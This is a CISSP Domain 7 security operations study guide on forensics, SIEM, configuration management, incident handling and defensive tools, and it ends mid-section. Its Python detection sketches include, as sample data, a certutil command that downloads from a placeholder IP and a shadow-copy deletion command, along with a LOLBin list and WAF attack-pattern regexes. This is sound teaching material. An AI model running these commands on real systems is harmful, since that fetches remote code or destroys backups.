Security Operations Reference Guide

Security Operations Reference Guide — CISSP Domain 7

Digital investigations transform raw technical data into legally admissible evidence. The rigor of evidence collection determines whether findings can be used in administrative, civil, criminal, or regulatory proceedings. A technically perfect investigation that follows improper collection procedures may produce unusable evidence — making the investigation itself a liability.

Evidence handling principles

Chain of custody

A documented, unbroken record of who had possession of evidence, when, and what was done with it. Starts at the moment of collection and continues through analysis, storage, and disposition. Any gap or undocumented handoff breaks the chain — potentially rendering evidence inadmissible in court.
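As a rough illustration of what "unbroken" means in practice, the sketch below models a custody log and flags any handoff where the person releasing the item is not the last recorded holder. The `CustodyEvent` fields and the `find_custody_gaps` helper are hypothetical names chosen for this example, not part of any standard evidence-management tool.

```python
from dataclasses import dataclass
from datetime import datetime


@dataclass(frozen=True)
class CustodyEvent:
    item_id: str
    released_by: str   # empty string for the initial collection
    received_by: str
    timestamp: datetime
    action: str


def find_custody_gaps(events):
    """Return one message per handoff where the releaser was not the recorded holder."""
    gaps = []
    holder = None
    for ev in sorted(events, key=lambda e: e.timestamp):
        if holder is not None and ev.released_by != holder:
            gaps.append(
                f"{ev.timestamp.isoformat()}: released by {ev.released_by}, "
                f"but last recorded holder was {holder}"
            )
        holder = ev.received_by
    return gaps


log = [
    CustodyEvent("HDD-001", "", "alice", datetime(2024, 1, 5, 9, 0), "collected"),
    CustodyEvent("HDD-001", "alice", "bob", datetime(2024, 1, 5, 14, 0), "transfer to lab"),
    # Undocumented handoff: bob -> carol was never logged.
    CustodyEvent("HDD-001", "carol", "dave", datetime(2024, 1, 9, 10, 0), "transfer to storage"),
]
gaps = find_custody_gaps(log)
for gap in gaps:
    print(gap)
```

A real evidence log would also record signatures, seal numbers, and storage locations; the point here is only that every transfer must connect to the one before it.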

Order of volatility

Evidence must be collected from most to least volatile: CPU registers and cache → RAM (including the process table and network connection state) → swap/pagefile → disk storage → removable media → backups. Volatile data is lost when a system is powered off, so collection sequence is critical. Never power off a running system before collecting RAM.

Integrity verification

Every piece of digital evidence must be hashed (SHA-256 or better) at the point of collection and again before analysis. If the hashes match, the evidence is demonstrably unmodified. Imaging tools often record MD5 and SHA-1 digests as well for compatibility with older workflows, but both algorithms have known collision weaknesses, so SHA-256 should be the value relied on for verification. Write blockers prevent accidental modification during imaging.
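The hash-at-collection, hash-before-analysis check can be sketched with Python's standard `hashlib` module. The file name and the `sha256_of` and `verify` helpers are illustrative assumptions; a real workflow would hash the image produced by the imaging tool and record the digest in the evidence log.

```python
import hashlib
import tempfile
from pathlib import Path


def sha256_of(path, chunk_size=1024 * 1024):
    """Hash a file in chunks so large disk images do not need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify(path, recorded_hash):
    """True if the file still matches the hash recorded at collection."""
    return sha256_of(path) == recorded_hash.lower()


with tempfile.TemporaryDirectory() as tmp:
    image = Path(tmp) / "evidence.img"          # stand-in for a forensic image
    image.write_bytes(b"\x00" * 4096)
    collected = sha256_of(image)                # recorded at the point of collection
    unchanged = verify(image, collected)        # re-checked before analysis
    image.write_bytes(b"\x00" * 4095 + b"\x01")  # simulate a one-byte modification
    tampered_detected = not verify(image, collected)

print(unchanged, tampered_detected)
```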

Forensic imaging

Analysis is conducted on a forensic copy — never on the original evidence. Bit-for-bit disk images (dd, FTK Imager, Guymager) preserve every sector, including deleted files and unallocated space. The original disk is sealed, logged, and stored as evidence. Modifications to the image do not affect the original.

Digital forensics artifacts

Computer artifacts

Registry hives (Windows), prefetch files, browser history, event logs, $MFT (Master File Table), LNK files, shellbags, NTFS timestamps (created/modified/accessed/MFT changed — all four can indicate tampering). Each artifact type has specific forensic tools and interpretation methods.

Network artifacts

PCAP (packet capture) files, NetFlow records, firewall logs, DNS query logs, proxy logs, DHCP logs. Network artifacts provide evidence of communication — who connected to what, when, for how long, and how much data was transferred. Essential for exfiltration investigation.

Mobile device artifacts

Call records, SMS/message data, location history, app data, cloud sync records. Mobile forensics requires specialized tools (Cellebrite UFED, Oxygen Forensic) and may require legal process (warrant) to compel unlocking. Device encryption can block direct extraction, and iCloud/Google account backups may contain more data than can be recovered from the device itself.

Cloud artifacts

Audit logs (CloudTrail, Azure Monitor), access logs, API call history, identity provider logs. Cloud artifacts are ephemeral: log retention periods are finite and must be configured before an incident, not after. Some cloud artifacts are only available at higher logging tiers, as the Microsoft Storm-0558 case showed.

🌐 Real-world example — chain of custody

In a 2018 corporate espionage case, a financial services firm’s security team imaged a departing employee’s laptop and found evidence of trade secret exfiltration. During the civil lawsuit, opposing counsel challenged the evidence: the laptop had been stored in an unlocked storage room for two weeks after imaging, with no evidence log showing who had access. The metadata discrepancy between the forensic image timestamp and the storage log created reasonable doubt about whether the evidence had been tampered with. The case settled for a fraction of the claimed damages — not because the technical evidence was wrong, but because the chain of custody had not been maintained. A tamper-evident evidence bag, a locked storage room, and a signed evidence log would have made the evidence bulletproof.

Order of volatility in practice: A responder arriving at a running system that may have been compromised should capture a memory image before taking any action that changes system state: before running other tools on the host, before pulling the network cable, and before shutting down. RAM contains running processes, decrypted credentials, encryption keys, and active network connections that exist nowhere else and are gone the moment power is removed.

7.2

Conduct logging and monitoring activities

You cannot defend what you cannot see. Logging and monitoring are the sensory system of security operations — without them, attackers operate in darkness, lateral movement goes undetected, and incidents are discovered by the attacker’s own disclosure rather than the defender’s vigilance. The global average dwell time before detection is still measured in months; logging and monitoring is the discipline that closes that window.

SIEM

Security Information and Event Management. Aggregates, normalizes, and correlates log data from across the environment. Applies detection rules to identify security events. Provides search, dashboarding, and alerting. The SOC’s primary investigation platform.

Splunk, Microsoft Sentinel, IBM QRadar, Elastic SIEM. Value is proportional to log coverage and rule quality — a SIEM with incomplete log sources and no tuned rules generates noise, not signal.
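To make "correlation rule" concrete, here is a minimal sketch of one common pattern: several failed logins from a source followed by a success from the same source within a time window. The event tuple layout, the threshold, and the function name are assumptions for illustration; production SIEMs express this in their own query or rule languages.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta


def detect_bruteforce_then_success(events, threshold=5, window=timedelta(minutes=10)):
    """events: (timestamp, source_ip, user, outcome) tuples, sorted by timestamp."""
    recent_failures = defaultdict(deque)
    alerts = []
    for ts, src, user, outcome in events:
        fails = recent_failures[src]
        # Drop failures that have aged out of the correlation window.
        while fails and ts - fails[0] > window:
            fails.popleft()
        if outcome == "failure":
            fails.append(ts)
        elif outcome == "success" and len(fails) >= threshold:
            alerts.append({"time": ts, "source_ip": src, "user": user, "failures": len(fails)})
            fails.clear()
    return alerts


t0 = datetime(2024, 3, 1, 2, 0)
events = [(t0 + timedelta(seconds=30 * i), "203.0.113.7", "svc-backup", "failure") for i in range(6)]
events.append((t0 + timedelta(minutes=4), "203.0.113.7", "svc-backup", "success"))
events.append((t0 + timedelta(minutes=5), "198.51.100.9", "jdoe", "success"))

alerts = detect_bruteforce_then_success(events)
print(alerts)
```

The rule only works if authentication logs from every relevant system reach the SIEM, which is the log coverage point made above.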

IDS/IPS

Intrusion Detection System (IDS) monitors traffic and alerts on policy violations. Intrusion Prevention System (IPS) can actively block. Signature-based detection catches known patterns; anomaly-based detection catches deviations from baseline. Network-based (NIDS/NIPS) or host-based (HIDS/HIPS).

Snort, Suricata (open-source NIDS/IPS). HIDS: Wazuh, OSSEC. IPS on internet edge; IDS on internal segments for lateral movement detection. Alert fatigue from untuned rules is the primary operational failure mode.

UEBA

User and Entity Behavior Analytics. Builds behavioral baselines for users, devices, and service accounts — then alerts on deviations. “This user never accesses financial systems at 2am but just downloaded 50,000 records” is a UEBA detection. Effective against insider threats and compromised accounts behaving normally except for subtle anomalies.

Microsoft Sentinel UEBA, Splunk UEBA, Exabeam. UEBA reduces false positives vs. rule-based detection by contextualizing alerts against individual baselines rather than static thresholds.
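The difference between an individual baseline and a static threshold can be shown with a simple z-score check. This is a deliberately simplified sketch: the per-entity histories are made-up numbers, and commercial UEBA products use far richer models than a mean and standard deviation.

```python
from statistics import mean, stdev


def is_anomalous(history, observed, z_threshold=3.0):
    """Flag an observation that sits far above this entity's own baseline."""
    mu = mean(history)
    sigma = stdev(history)
    if sigma == 0:
        return observed != mu
    return (observed - mu) / sigma > z_threshold


# Records downloaded per day over the past week (illustrative values).
baselines = {
    "alice": [120, 95, 130, 110, 105, 125, 115],
    "etl-service": [48000, 51000, 50500, 49500, 52000, 50000, 49000],
}

# The same 50,000-record download is judged against each entity's own history.
alice_flagged = is_anomalous(baselines["alice"], 50000)
etl_flagged = is_anomalous(baselines["etl-service"], 50000)
print(alice_flagged, etl_flagged)
```

A static threshold of, say, 10,000 records would either fire daily on the ETL service account or be raised high enough to miss the user entirely; the per-entity baseline avoids both.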

Threat intelligence

External data about known threat actors, their techniques, infrastructure (IP addresses, domains, file hashes), and active campaigns. Enriches detection by correlating internal events with known attacker infrastructure. Threat feeds provide IOCs (Indicators of Compromise); threat intelligence platforms (TIPs) aggregate and operationalize them.

MISP, OpenCTI (open-source TIPs). Threat feeds: AlienVault OTX, VirusTotal, commercial feeds. Threat hunting uses intelligence to proactively search for evidence of known TTPs before alerts fire.
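IOC enrichment reduces to checking internal event fields against sets of known-bad values. The sketch below assumes a hypothetical event layout and uses documentation-range IP addresses and `.example` domains as stand-in indicators; it does not use any real feed format.

```python
def match_iocs(events, iocs):
    """Return (event id, field, value) for every event field that matches an indicator."""
    hits = []
    for event in events:
        for field, value in event.items():
            if field in iocs and value in iocs[field]:
                hits.append((event["id"], field, value))
    return hits


# Indicators keyed by the event field they apply to (placeholder values).
iocs = {
    "dst_ip": {"203.0.113.50"},
    "domain": {"bad.example"},
}

events = [
    {"id": 1, "dst_ip": "198.51.100.10", "domain": "intranet.example"},
    {"id": 2, "dst_ip": "203.0.113.50", "domain": "cdn.example"},
    {"id": 3, "dst_ip": "192.0.2.8", "domain": "bad.example"},
]

hits = match_iocs(events, iocs)
print(hits)
```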

Egress monitoring

Monitoring of data leaving the organization — via email, web upload, cloud sync, USB, or printing. DLP (Data Loss Prevention) at the perimeter detects policy-violating data movement. DNS monitoring catches data exfiltration over DNS tunneling. NetFlow analysis identifies unusual outbound data volumes to unexpected destinations.

Most breaches include an exfiltration phase — data is stolen, not just accessed. Egress monitoring is the last detection opportunity before data leaves the environment permanently.
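One common heuristic for spotting DNS tunneling is to look for unusually long or high-entropy subdomain labels, since encoded payloads look different from human-chosen hostnames. The thresholds below are illustrative assumptions, and the code naively treats the last two labels as the registered domain, which is wrong for suffixes such as `co.uk`.

```python
import math
from collections import Counter


def shannon_entropy(text):
    """Bits of entropy per character in text."""
    counts = Counter(text)
    total = len(text)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())


def looks_like_tunneling(qname, max_label_len=40, entropy_threshold=3.5):
    labels = qname.rstrip(".").split(".")
    sub_labels = labels[:-2]  # naive: assumes a two-label registered domain
    if not sub_labels:
        return False
    subdomain = "".join(sub_labels)
    longest = max(len(label) for label in sub_labels)
    high_entropy = len(subdomain) >= 20 and shannon_entropy(subdomain) > entropy_threshold
    return longest > max_label_len or high_entropy


queries = [
    "www.example.com",
    "example.com",
    "0123456789abcdefghijklmnopqrstuvwxyz0123456789.t.example.com",
]
flags = [looks_like_tunneling(q) for q in queries]
print(flags)
```

In practice this kind of check is combined with query volume per domain and per client, because a single odd-looking name is weak evidence on its own.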

Threat hunting

Proactive, hypothesis-driven search for evidence of attacker activity that has not triggered automated alerts. Hunters form hypotheses based on threat intelligence (“if an attacker used Living off the Land binaries on our Windows servers, what would that look like?”) and search log and endpoint data to test them.

MITRE ATT&CK provides the framework for hunting hypotheses. Hunting finds what detection rules miss — the attacker who stays below alert thresholds, the novel technique not yet in signature databases, the misconfiguration being exploited slowly.
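The Living off the Land hypothesis above can be turned into a simple search over process-creation telemetry. This sketch assumes events are dictionaries with `host`, `image`, and `command_line` keys; the binary list and suspicious tokens are a small illustrative subset, not a complete hunting rule.

```python
LOLBINS = {"certutil.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe", "bitsadmin.exe"}
SUSPICIOUS_TOKENS = ("http://", "https://", "-urlcache", "scrobj.dll")


def hunt_lolbins(process_events):
    """Return events where a built-in Windows binary runs with download-style arguments."""
    findings = []
    for ev in process_events:
        image = ev["image"].lower().rsplit("\\", 1)[-1]
        command_line = ev["command_line"].lower()
        if image in LOLBINS and any(token in command_line for token in SUSPICIOUS_TOKENS):
            findings.append(ev)
    return findings


events = [
    {"host": "srv-01", "image": r"C:\Windows\System32\certutil.exe",
     "command_line": "certutil.exe -urlcache -split -f http://203.0.113.9/a.txt a.txt"},
    {"host": "srv-02", "image": r"C:\Windows\System32\certutil.exe",
     "command_line": "certutil.exe -hashfile report.pdf SHA256"},
    {"host": "srv-03", "image": r"C:\Windows\System32\notepad.exe",
     "command_line": "notepad.exe http://notes.txt"},
]

findings = hunt_lolbins(events)
print([f["host"] for f in findings])
```

A hunt like this produces leads rather than verdicts: each finding still needs an analyst to check whether the activity was an administrator's legitimate use of the tool.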

🌐 Real-world example — SIEM log gap

In the 2023 Microsoft/Storm-0558 breach, a US government agency detected the intrusion because it had purchased Microsoft’s highest-tier audit logging license, which included MailItemsAccessed events. Those events showed mailboxes being read by an application ID that did not normally access them. Agencies on lower-tier licenses did not have these log events and had no visibility into the same intrusion occurring in their tenants. Microsoft subsequently expanded access to the relevant logs at lower license tiers after government and congressional pressure. The incident established that log coverage is a security control: an organization that cannot afford the logging tier that provides security-relevant events has an unmonitored attack surface, regardless of how good its SIEM rules are.

7.3

Perform Configuration Management

Configuration management ensures that systems are built, maintained, and modified according to documented, approved standards, and that deviations are detected and remediated. Unconfigured or misconfigured systems are among the most common sources of exploitable vulnerabilities in enterprise environments. Far more breaches begin with a misconfiguration than with a zero-day.

Core CM concepts

Baseline configuration: The approved, documented secure configuration for a system type — servers, workstations, network devices, cloud resources. Baselines are derived from industry standards (CIS Benchmarks, DISA STIGs) and tailored to the organization’s requirements. Every system must be built from the approved baseline.

Provisioning: Automated deployment of systems from the approved baseline — using infrastructure as code (Terraform, CloudFormation), configuration management tools (Ansible, Puppet, Chef), or golden disk images. Automation ensures every system starts from the same known-good state and eliminates human variation.

Configuration drift detection: Continuous comparison of current system configuration against the approved baseline. Systems that have drifted (manual changes, failed patches, misconfigurations introduced by software updates) are flagged for remediation. Tools: Tripwire, AWS Config, Azure Policy, OPA.

Change control integration: Every authorized configuration change must flow through the change management process (7.9) — reviewed, approved, tested, and documented. Unapproved configuration changes detected by drift monitoring are either unauthorized (security incident) or undocumented (change control failure).
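Drift detection, at its core, is a comparison between the approved baseline and what is actually running. The sketch below compares two dictionaries of settings; the keys are real `sshd_config` option names used as an example, while the `detect_drift` helper and the flat key/value model are simplifying assumptions.

```python
def detect_drift(baseline, current):
    """Return settings that differ from, are missing from, or were added to the baseline."""
    drift = {}
    for key in baseline.keys() | current.keys():
        expected = baseline.get(key, "<absent>")
        actual = current.get(key, "<absent>")
        if expected != actual:
            drift[key] = {"expected": expected, "actual": actual}
    return drift


baseline = {
    "PermitRootLogin": "no",
    "PasswordAuthentication": "no",
    "X11Forwarding": "no",
}
current = {
    "PermitRootLogin": "yes",          # changed by hand
    "PasswordAuthentication": "no",
    "X11Forwarding": "no",
    "PermitEmptyPasswords": "yes",     # setting not present in the baseline
}

drift = detect_drift(baseline, current)
for setting, values in sorted(drift.items()):
    print(setting, values)
```

Each flagged setting then needs to be matched against change records: a drift entry with no approved change behind it is either an incident or a change control failure.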

🌐 Real-world example — misconfiguration breach

The 2019 Capital One breach originated from a single misconfigured Web Application Firewall rule. A security engineer had modified the WAF configuration to resolve a performance issue — the change was never reviewed or tested for security implications, and it was never entered into the change management system. The misconfiguration allowed SSRF (Server-Side Request Forgery) attacks to reach the EC2 Instance Metadata Service, leaking IAM credentials. A configuration management system that automatically compared WAF rules to the approved baseline would have flagged the unauthorized change within hours. Change control that required security review of WAF rule modifications would have caught the security implication before deployment.

7.4

Apply foundational security operations concepts

Security operations are governed by a set of foundational principles that, applied consistently, prevent the most common insider threat, fraud, and privilege abuse scenarios. These principles are not theoretical — they are the operational implementation of the security architecture decisions made upstream.

Need-to-know / least privilege

Access to information is granted only when there is a documented operational need, to the minimum extent necessary. Operational implementation: access requests require business justification, approvals expire, and access is revoked when the need ends. A database administrator does not need access to all customer records — only the schemas they administer.

Separation of duties

No single person or process can carry out a sensitive operation end-to-end without oversight. The person who initiates a wire transfer cannot also approve it. The developer who writes code cannot also deploy it to production. The person who requests access cannot also approve it. SoD is enforced in system controls, not just policy.
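Enforcing separation of duties "in system controls" can be as simple as a check the approval code path cannot skip. The request structure and the `SeparationOfDutiesError` name below are hypothetical, intended only to show the shape of such a control.

```python
class SeparationOfDutiesError(Exception):
    """Raised when one person attempts to both request and approve an operation."""


def approve(request, approver):
    # The control lives in code, so it holds even if policy is ignored.
    if approver == request["requested_by"]:
        raise SeparationOfDutiesError(f"{approver} cannot approve their own request")
    return {**request, "approved_by": approver, "status": "approved"}


wire = {"id": "WT-1001", "requested_by": "alice", "amount": 250_000, "status": "pending"}

approved = approve(wire, "bob")

try:
    approve(wire, "alice")
    self_approval_blocked = False
except SeparationOfDutiesError:
    self_approval_blocked = True

print(approved["status"], self_approval_blocked)
```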

Privileged account management

Privileged accounts (domain admin, root, cloud admin) are managed in a PAM system, require MFA, have no persistent standing access (JIT), and all sessions are recorded. Privileged account credentials are never shared and are rotated after each use or on a defined schedule.

Job rotation

Regularly rotating staff through different roles serves two security functions: it detects fraud and errors that a permanent occupant might conceal (the temporary replacement notices anomalies), and it prevents over-dependence on a single individual with irreplaceable knowledge of a critical system.

Service Level Agreements (SLA)

SLAs define contractual performance commitments between service providers and customers — including security-relevant commitments: incident notification timelines, uptime guarantees, patch application timelines, and audit rights. SLAs are the operational mechanism for enforcing third-party security obligations.

🌐 Real-world example — SoD failure

The 2002 WorldCom accounting fraud — $11 billion in fraudulent entries — was facilitated by a complete absence of separation of duties in the accounting function. The CFO who ordered the entries was also the person responsible for reviewing and approving them. No independent review existed. The fraud was discovered by internal audit — an independent function that examined entries the CFO had approved. Effective SoD would have required a second approver independent of the CFO for journal entries above a threshold. The absence of this operational control enabled the largest accounting fraud in US history at the time.

7.5

Apply resource protection

Resource protection ensures that the physical and logical assets of an organization — storage media, data in motion, data at rest — are protected against unauthorized access, modification, and destruction throughout their useful life and during disposal.

Media management

All removable media (USB drives, backup tapes, optical disks) must be inventoried, labeled with the highest classification of data they contain, and handled according to that classification level. Uncontrolled removable media is both a data exfiltration vector and a malware delivery mechanism — USB drives remain among the most effective physical attack vectors.

Media protection

Media containing sensitive data must be encrypted at rest. Backup tapes leaving the facility must be encrypted and tracked with chain of custody. Media awaiting disposal must be secured from the moment of decommissioning until verified destruction — not left in a pile in the server room for months awaiting a vendor visit.

Data at rest

AES-256 encryption for stored data. Key management separate from data (encrypted data and its encryption key should not be stored together — if they are, the encryption provides no protection). Full-disk encryption for all endpoint devices. Database-level and file-level encryption for sensitive data in applications.

Data in transit

TLS 1.2+ for all application traffic. IPSec or TLS for internal network traffic where data sensitivity warrants it. Encrypted VPN or ZTNA for remote access. No unencrypted transmission of sensitive data — not over the internet, not on internal networks, not via email without encryption.
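For client code, the "TLS 1.2+" requirement can be enforced rather than assumed. The sketch below uses Python's standard `ssl` module; the `make_client_context` helper name is an assumption, and whether TLS 1.3 should be the floor instead depends on what the servers involved support.

```python
import ssl


def make_client_context():
    # create_default_context() enables certificate and hostname verification.
    ctx = ssl.create_default_context()
    # Refuse to negotiate anything older than TLS 1.2.
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


ctx = make_client_context()
print(ctx.minimum_version, ctx.verify_mode, ctx.check_hostname)
```

The context can then be passed to standard library clients, for example as the `context` argument of `urllib.request.urlopen`.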

🌐 Real-world example — USB as attack vector

In 2008, a USB drive infected with the Agent.btz malware was reportedly found in a parking lot outside a US Department of Defense facility. An employee plugged it in. The malware spread to classified and unclassified networks, including US Central Command, and took roughly 14 months to fully eradicate. The response, Operation Buckshot Yankee, contributed directly to the creation of US Cyber Command. The infection began with a single uncontrolled USB device. In response, DoD banned USB flash drives and other removable media on its systems, a media management control. Endpoint controls that disable USB ports or require approved device certificates close off most of this attack vector.

7.6

Conduct incident management

Incident management is the structured process by which security events are detected, analyzed, contained, eradicated, and recovered from — while preserving evidence and communicating appropriately with stakeholders. An unmanaged incident is a controlled burn that becomes a wildfire. A well-managed incident is a controlled burn that achieves a defined outcome.

The incident management process has seven phases:

Phase 1: Detection
Phase 2: Response
Phase 3: Mitigation
Phase 4: Reporting
Phase 5: Recovery
Phase 6: Remediation
Phase 7: Lessons learned

Detection

The transition from unknown compromise to known incident. Detection sources include SIEM alerts, EDR detections, IDS alerts, user reports, threat intelligence matches, and — in too many cases — external notification from law enforcement, customers, or researchers. The earlier detection occurs, the less damage accumulates. IBM/Ponemon 2023: organizations detect breaches on average 204 days after initial compromise. Every day of undetected access increases the scope of data accessed, credentials stolen, and persistence mechanisms installed.

Key elements: multiple detection sources, triage and severity classification, incident declaration threshold.

🌐 Real-world example

The 2017 Equifax breach was active for about 76 days before detection. Equifax had monitoring in place, but the SSL inspection appliance that should have been inspecting encrypted traffic in the affected environment had an expired certificate and was not functioning. Encrypted exfiltration traffic passed through uninspected for the entire period. A monitoring system health check that verified SSL inspection was functioning on all monitored segments would have surfaced the gap before the breach exploited it.

Lessons learned is the most neglected phase. Organizations that skip post-incident review are condemned to repeat incidents. The SolarWinds breach, the Colonial Pipeline attack, and the Uber breach all exploited techniques and conditions that had been observed in prior incidents at other organizations. Shared threat intelligence and internal post-incident reviews are the mechanism by which the industry learns. A lessons learned session without assigned action items, owners, and deadlines is a meeting, not an improvement process.

7.7

Operate and maintain detection and preventative measures

Detection and prevention tools form the active defense layer of security operations — they must be continuously maintained, tuned, and updated to remain effective. A detection tool that generates 10,000 alerts per day and results in no investigations is not a detection tool; it is alert noise that trains analysts to ignore their dashboards.

Next-Generation Firewall (NGFW)

NGFWs extend traditional packet filtering with application-layer inspection, user identity awareness, SSL/TLS inspection, integrated IPS, and threat intelligence feeds. Unlike traditional stateful firewalls, which examine only IP address, port, protocol, and connection state, NGFWs can distinguish between authorized applications (Salesforce on port 443) and unauthorized ones (personal Dropbox on the same port 443) and enforce policy accordingly.

SSL inspection operational considerations

SSL/TLS inspection requires the NGFW to act as a man-in-the-middle — terminating encrypted connections and re-encrypting them. This requires deploying the NGFW’s CA certificate to all endpoints and managing certificate exceptions for services that use certificate pinning. SSL inspection that is not functioning (expired certificate, misconfiguration) creates a blind spot that attackers actively exploit — as in the Equifax breach.

Real-world example

During the 2021 Hafnium Exchange Server attacks, organizations with NGFWs configured with application awareness and outbound connection inspection detected anomalous PowerShell web requests from Exchange servers — a behavior pattern that matched Hafnium’s webshell activity. Organizations with basic stateful firewalls saw only port 443 traffic from Exchange and detected nothing. The NGFW’s application-layer visibility converted a signature-unknown attack into a behavioral anomaly that triggered investigation.

Web Application Firewall (WAF)

WAFs inspect HTTP/HTTPS traffic to web applications and block requests matching attack patterns — SQL injection, XSS, CSRF, path traversal, and other OWASP Top 10 vulnerabilities. Operates at Layer 7, inline between the internet and the application. Can be deployed in detection mode (log only) or prevention mode (block matching requests).

Operational consideration

WAF rules require tuning: default rule sets generate significant false positives for legitimate application traffic. Starting in detection mode, reviewing alerts, and adjusting rules before switching to prevention mode prevents blocking legitimate users. WAF bypasses (encoding variations, protocol edge cases) make WAFs a necessary but not sufficient control; they must be combined with secure coding practices and dynamic application security testing (DAST).
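The difference between detection mode and prevention mode can be sketched with a toy rule engine. The three regular expressions below are intentionally crude stand-ins for real rule sets, and the `inspect` function is a hypothetical name; the point is that the same match is only logged in one mode and blocked in the other.

```python
import re

# Deliberately simple patterns; real rule sets are far more thorough.
RULES = {
    "sqli": re.compile(r"\bunion\b.+\bselect\b|'\s*or\s+'?1'?\s*=\s*'?1", re.IGNORECASE),
    "path_traversal": re.compile(r"\.\./"),
    "xss": re.compile(r"<script\b", re.IGNORECASE),
}


def inspect(request_target, mode="detect"):
    """Evaluate a request target; block only when running in prevention mode."""
    matched = [name for name, pattern in RULES.items() if pattern.search(request_target)]
    action = "block" if matched and mode == "prevent" else "allow"
    return {"action": action, "matched": matched, "logged": bool(matched)}


attack = "/search?q=1' OR '1'='1"
detect_result = inspect(attack, mode="detect")
prevent_result = inspect(attack, mode="prevent")
benign_result = inspect("/products?id=42", mode="prevent")
print(detect_result, prevent_result, benign_result)
```

Running in detection mode first shows which legitimate requests the rules would have blocked, which is the tuning data needed before switching modes.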

Real-world example

The 2019 Capital One breach was enabled by a misconfigured WAF — but that same breach illustrates WAF value: the SSRF attack that succeeded would have been blocked by a correctly configured WAF rule. Cloud-native WAFs (AWS WAF, Azure WAF, Cloudflare WAF) provide managed rule sets that are updated by the vendor as new attack patterns emerge — but custom application-specific rules still require manual tuning and regular review.

Sandboxing

Sandboxing detonates suspicious files, URLs, or code in an isolated, instrumented environment and observes their behavior. Unlike signature-based detection (which compares files to a database of known malicious patterns), sandboxing detects novel malware by observing what it actually does: the network connections it makes, the files it drops, the registry keys it modifies, and the processes it spawns. Effective against zero-day and polymorphic malware that evades signatures.

Sandbox evasion

Sophisticated malware actively detects sandbox environments (checking for mouse movement, human user activity, VM artifacts, specific hardware configurations) and behaves benignly when sandboxed. Anti-evasion techniques: extended detonation periods (minutes rather than seconds), human interaction simulation, bare-metal sandboxes, and behavioral analysis that detects evasion attempts as suspicious in themselves.

Real-world example

The SUNBURST malware in the SolarWinds supply chain attack went undetected for months; it came to light in December 2020, when FireEye (now Trellix) investigated a breach of its own network. The malware was designed to lie dormant for up to two weeks and check for analysis and sandbox indicators before activating. That dormancy period far exceeds typical sandbox detonation windows. The incident pushed the industry toward longer detonation periods and toward treating time-based dormancy as an analysis dimension.

Honeypots and honeynets

Honeypots are decoy systems designed to attract and detect attacker activity. A honeypot looks like a legitimate target (a server with an interesting hostname like “payroll-backup” or “admin-console”) but has no legitimate user traffic. Any access to a honeypot is by definition suspicious — there is no legitimate reason for a user or system to contact it. A honeynet is a network of honeypots providing a richer deception environment.

High-fidelity detections

Honeypot alerts have extremely low false positive rates — a legitimate user or system should never contact a honeypot. This makes honeypot alerts high-priority indicators of either reconnaissance activity (an attacker scanning the network) or active compromise (malware performing lateral movement). Honey credentials (fake credentials planted in configuration files or password managers) detect credential theft — when the fake credentials are used, the theft is confirmed.

Real-world example

The Conti ransomware gang’s internal playbooks — leaked in 2022 — specifically instructed operators to avoid connecting to honeypot indicators and to check hostnames and service banners for common honeypot signatures (“honey”, “trap”, “decoy”) before proceeding. The fact that sophisticated ransomware operators train their affiliates to evade honeypots confirms that honeypots are effective enough to be operationally consequential to attackers. Financial sector honeypots have detected active banking trojan infections before the malware reached production systems by monitoring for connections to decoy banking API endpoints.

EDR and anti-malware

Traditional antivirus matches files against signature databases — effective against known malware, ineffective against novel threats, fileless attacks, and living-off-the-land techniques. EDR (Endpoint Detection and Response) monitors endpoint behavior continuously — process creation, file system changes, network connections, registry modifications, memory injection — and detects malicious behavior patterns regardless of whether a specific signature exists.

NGAV vs EDR

NGAV (Next-Gen AV): Machine learning-based prevention, behavioral analysis, reputation scoring. Replaces signature-based AV for prevention. EDR: Continuous monitoring, threat hunting capability, automated response (isolate host, kill process), forensic telemetry for investigation. Modern platforms (CrowdStrike Falcon, Microsoft Defender for Endpoint, SentinelOne) combine NGAV prevention with full EDR telemetry and response in a single agent.
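Behavioral detection looks at what a process does rather than what file it came from. The sketch below flags two ransomware-typical behaviors from a stream of endpoint events: a burst of file renames by one process, and a command line that deletes volume shadow copies. The event layout, thresholds, and function name are assumptions for illustration, not any vendor's detection logic.

```python
from collections import defaultdict, deque


def flag_ransomware_behavior(events, rename_threshold=20, window_seconds=5):
    """events: dicts sorted by 't' (seconds). Returns {pid: set of behavior names}."""
    renames = defaultdict(deque)
    flagged = {}
    for ev in events:
        pid = ev["pid"]
        if ev["type"] == "process_start":
            command_line = ev["command_line"].lower()
            if "vssadmin" in command_line and "delete shadows" in command_line:
                flagged.setdefault(pid, set()).add("shadow_copy_deletion")
        elif ev["type"] == "file_rename":
            recent = renames[pid]
            recent.append(ev["t"])
            # Keep only renames inside the sliding window.
            while recent and ev["t"] - recent[0] > window_seconds:
                recent.popleft()
            if len(recent) >= rename_threshold:
                flagged.setdefault(pid, set()).add("mass_file_rename")
    return flagged


events = [{"t": i * 0.1, "pid": 4242, "type": "file_rename"} for i in range(25)]
events.append({"t": 2.6, "pid": 4243, "type": "process_start",
               "command_line": "vssadmin.exe delete shadows /all /quiet"})
events.append({"t": 3.0, "pid": 100, "type": "file_rename"})

flagged = flag_ransomware_behavior(events)
print(flagged)
```

In an EDR product a match like this would typically trigger an automated response such as killing the process or isolating the host.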

Real-world example

In the 2021 Kaseya VSA ransomware attack, endpoints with CrowdStrike Falcon’s behavioral detection caught the REvil ransomware execution attempt and blocked it within seconds — before any encryption occurred. Endpoints without EDR (relying on signature-based AV) were fully encrypted within minutes of the malicious update being pushed. The post-incident analysis showed that EDR behavioral rules for ransomware-typical behavior (rapid file renaming with encryption extensions, shadow copy deletion) triggered immediately on the first affected endpoint, demonstrating that effective EDR makes ransomware a recoverable incident rather than a catastrophic one.

AI and machine learning security tools

AI/ML-based security tools apply machine learning models to detect anomalies, classify threats, prioritize alerts, and automate response. Applications include: network traffic anomaly detection (detects C2 communication patterns without signatures), email security (detects phishing based on content and behavioral signals), UEBA (behavioral baseline deviations), vulnerability prioritization (predicts exploitability based on contextual signals), and SOAR (automated playbook execution).

Strengths and limitations

